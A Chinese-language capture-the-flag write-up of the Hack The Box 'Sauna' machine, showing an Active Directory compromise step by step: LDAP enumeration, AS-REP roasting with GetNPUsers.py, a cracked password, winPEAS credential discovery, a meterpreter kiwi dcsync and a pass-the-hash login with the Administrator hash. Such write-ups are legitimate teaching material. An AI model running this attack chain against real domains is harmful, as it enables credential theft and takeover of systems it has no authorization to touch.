基本信息

lab地址:https://www.hackthebox.eu/home/machines/profile/229

  • 10.10.10.175

端口扫描

80

389

389是ldap,用nmap ldap相关脚本详细扫描:

1
nmap -n -sV -script "ldap*" -p 389 10.10.10.175

根据结果,域应该是EGOTISTICAL-BANK.LOCAL

用户名字典

根据adout信息,生成用户民字典:

1
2
3
4
5
6
fsmith
hbear
skerb
scoins
btaylor
sdriver

GetNPUser

https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetNPUsers.py

利用这个和前面的用户名字典,得到一个有效的TGT:

1
2
3
4
python GetNPUsers.py EGOTISTICAL-BANK.LOCAL/ -usersfile user.txt -outputfile hash.txt -dc-ip 10.10.10.175

cat hash.txt
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:23e093d0dbeb39c9f9ca834a989c73e8$6e4bd269f8fe18d739cd032667f1683073a95b544511fb6f4f98df848a973e46a6724be00b8c94511b41aa8622d8a5a5a353fb21090c00d4797950268504f7b6b0957d38406a561a789820dec215a3d9ce3ed8f3cb5707329314fccd14f1380a5bb5298bb1ae85cab124615349b8117e0cc3f617d6f9f6327c0ef073e5b536796fde87567c377d13c8978dd6f2c62dd3424f20e86b58633196332e76656c6866f5127b23c73fc87df1815948d383fbd5c51e5431581f1bd5cc0a80fbee29d2eb51c7c2b6b2ff8f4284f5f5d4616dea2afca926c6e1282dad539b80879c628bb29d936a42e8341be0a100ae109175db32343fac9478717ba76a97bf4025cba13d

根据这个hash可以解出来密码(建议用kali自带的john解):

1
fsmith : Thestrokes23

user flag

使用evil-winrm,用这个账号密码登录,在桌面得到user.txt:

收集提权信息

https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/winPEAS/winPEASexe/winPEAS/bin/x64/Release/winPEAS.exe

evil-winrm里可以直接上传文件

1
upload winPEAS.exe
1
2
3
4
5
6
7
8
9
10
11
12
13
14
[+] Looking for AutoLogon credentials(T1012)
    Some AutoLogon credentials were found!!
    DefaultDomainName             :  EGOTISTICALBANK
    DefaultUserName               :  EGOTISTICALBANK\svc_loanmanager
    DefaultPassword               :  Moneymakestheworldgoround!
    
    *Evil-WinRM* PS C:\Users\FSmith\desktop> net user

User accounts for \\

-------------------------------------------------------------------------------
Administrator            FSmith                   Guest
HSmith                   krbtgt                   svc_loanmgr
The command completed with one or more errors.

所以svc_loanmgr的密码应该是Moneymakestheworldgoround!, 但这个账号也不是Administrator权限

dcsync

直接通过evil-winrm执行命令加载个meterpreter,然后:

1
2
load kiwi
dcsync Administrator

我们可以得到Administrator的NTLM Hash

PTH get root

不需要去破解Hash,可以直接使用PTH进行登录:

1
2
3
evil-winrm -i 10.10.10.175 -u Administrator -H 'd9485863c1e9e05851aa40cbb4ab9dff'

# -H, --hash NTHash                NTHash

得到root.txt:

参考资料